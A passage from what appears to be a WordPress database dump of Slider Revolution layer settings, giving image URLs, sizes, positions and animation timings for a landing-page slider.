":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"the printing lovely fonts and lovely. \",\"alias\":\"3.\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"251px\",\"e\":true},\"n\":{\"v\":\"252px\",\"e\":true},\"t\":{\"v\":\"248px\",\"e\":true},\"m\":{\"v\":\"221px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"27px\",\"e\":true}},\"originalWidth\":\"251px\"},\"position\":{\"x\":{\"d\":{\"v\":\"541px\",\"e\":true},\"n\":{\"v\":\"306px\",\"e\":true},\"t\":{\"v\":\"6px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"284px\",\"e\":true},\"n\":{\"v\":\"171px\",\"e\":true},\"t\":{\"v\":\"267px\",\"e\":true},\"m\":{\"v\":\"158px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"25px\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(23,9,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#fed3c3\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"2\":{\"text\":\"Image 2\",\"alias\":\"Flower\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic21.png\",\"imageId\":4592},\"size\":{\"width\":{\"d\":{\"v\":\"434px\",\"e\":true},\"n\":{\"v\":\"320px\",\"e\":true},\"t\":{\"v\":\"278px\",\"e\":true},\"m\":{\"v\":\"175px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"218px\",\"e\":true},\"n\":{\"v\":\"161px\",\"e\":true},\"t\":{\"v\":\"140px\",\"e\":true},\"m\":{\"v\":\"88px\",\"e\":true}},\"originalWidth\":434,\"originalHeight\":218,\"aspectRatio\":{\"d\":{\"v\":1.9908256880733946},\"n\":{\"v\":1.9908256880733946},\"t\":{\"v\":1.9908256880733946},\"m\":{\"v\":1.9908256880733946}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-558px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"84px\",\"e\":true},\"t\":{\"v\":\"30px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1200,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1200,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":2000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"1\":{\"text\":\"Image 1\",\"alias\":\"Parfume\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic11.png\",\"imageId\":4593},\"size\":{\"width\":{\"d\":{\"v\":\"561px\",\"e\":true},\"n\":{\"v\":\"390px\",\"e\":true},\"t\":{\"v\":\"368px\",\"e\":true},\"m\":{\"v\":\"196px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"329px\",\"e\":true},\"n\":{\"v\":\"229px\",\"e\":true},\"t\":{\"v\":\"216px\",\"e\":true},\"m\":{\"v\":\"115px\",\"e\":true}},\"originalWidth\":561,\"originalHeight\":329,\"aspectRatio\":{\"d\":{\"v\":1.7051671732522797},\"n\":{\"v\":1.7051671732522797},\"t\":{\"v\":1.7051671732522797},\"m\":{\"v\":1.7051671732522797}}},\"position\":{\"x\":{\"d\":{\"v\":\"55px\",\"e\":true},\"n\":{\"v\":\"-428px\",\"e\":true},\"t\":{\"v\":\"55px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"54px\",\"e\":true},\"t\":{\"v\":\"22px\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":380},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1200,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1200,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":1920,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Image 3\",\"alias\":\"Listici\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic41.png\",\"imageId\":4594},\"size\":{\"width\":{\"d\":{\"v\":\"145px\",\"e\":true},\"n\":{\"v\":\"209px\",\"e\":true},\"t\":{\"v\":\"120px\",\"e\":true},\"m\":{\"v\":\"77px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"64px\",\"e\":true},\"n\":{\"v\":\"92px\",\"e\":true},\"t\":{\"v\":\"53px\",\"e\":true},\"m\":{\"v\":\"34px\",\"e\":true}},\"originalWidth\":145,\"originalHeight\":64,\"aspectRatio\":{\"d\":{\"v\":2.265625},\"n\":{\"v\":2.265625},\"t\":{\"v\":2.265625},\"m\":{\"v\":2.265625}}},\"position\":{\"x\":{\"d\":{\"v\":\"35px\",\"e\":true},\"n\":{\"v\":\"-563px\",\"e\":true},\"t\":{\"v\":\"-325px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-146px\",\"e\":true},\"t\":{\"v\":\"-233px\",\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":700,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":700,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":2100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 4\",\"alias\":\"Kokos\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic31.png\",\"imageId\":4595},\"size\":{\"width\":{\"d\":{\"v\":\"570px\",\"e\":true},\"n\":{\"v\":\"535px\",\"e\":true},\"t\":{\"v\":\"291px\",\"e\":true},\"m\":{\"v\":\"177px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"180px\",\"e\":true},\"n\":{\"v\":\"169px\",\"e\":true},\"t\":{\"v\":\"92px\",\"e\":true},\"m\":{\"v\":\"56px\",\"e\":true}},\"originalWidth\":570,\"aspectRatio\":{\"d\":{\"v\":3.1666666666666665},\"n\":{\"v\":3.1666666666666665},\"t\":{\"v\":3.1666666666666665},\"m\":{\"v\":3.1666666666666665}}},\"position\":{\"x\":{\"d\":{\"v\":\"321px\",\"e\":true},\"n\":{\"v\":\"-206px\",\"e\":true},\"t\":{\"v\":\"171px\",\"e\"